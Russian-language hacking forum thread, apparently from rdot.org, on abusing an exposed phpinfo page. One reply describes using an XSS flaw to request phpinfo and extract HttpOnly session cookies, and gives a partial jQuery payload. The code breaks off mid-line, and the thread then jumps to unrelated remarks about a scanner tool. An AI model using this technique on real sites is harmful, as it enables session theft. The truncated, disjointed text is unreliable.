А что можно сделать зная phpinfo?

https://rdot.org/forum/showthread.php?t=1134

Пасибо братиш будем разбератся!

Это надо чтобы на сайте было обязfтелбно LFI?

Из phpinfo можно собирать куки, недоступные через JS, при помощи XSS.

Братиш можно поподробней на счет куков?

lansia, тебе интересна технология или суть?

Если технология, то все достаточно просто. Рассмотрим сайт, на котором мы нашли XSS, файл, выводящий phpinfo(), и на котором стоит jQuery. Последний пункт не обязателен, введем его для облегчения примера.

Через XSS отправляем запрос на phpinfo(), в обработчике success пишем свою функцию, которая распарсит ответ и вытащит PHP-куку:

[CODE]
$.ajax({url:'./phpinfo.php',success:function(d){
alert(/\["HTTP_COOKIE"\](.*?)

Если два раза нажать на старт то вылазит ошибка, сканер дальше может работать.

Спасибо полезная тулза.